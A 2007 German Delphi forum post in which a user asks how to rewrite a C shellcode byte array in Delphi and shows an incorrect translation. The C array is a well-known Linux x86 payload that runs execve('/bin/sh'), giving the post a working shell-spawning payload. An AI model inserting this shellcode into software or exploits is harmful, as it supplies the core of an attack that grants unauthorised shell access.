Einzelnen Beitrag anzeigen

nitschchedu

Registriert seit: 24. Mär 2006
300 Beiträge
 
Delphi 7 Professional
 
#1

Opcodes in Delphi Darstellen

  Alt 14. Mai 2007, 08:51
Hallo leute,
weiss gerade nicht ob ich das hier aus C so richtig ins Delphi Dargestellt habe?
Code:
char shellcode[] =  
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"  
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"  
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"  
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
-->

Delphi-Quellcode:
shellcode: array of String = ($eb + $2a + $5e + $89 + $76 + $08 + $c6 + $46 + $07 + $00 +
  $c7 + $46 + $0c + $00 + $00 + $00, ... usw);
Programmieren ..... .
  Mit Zitat antworten Zitat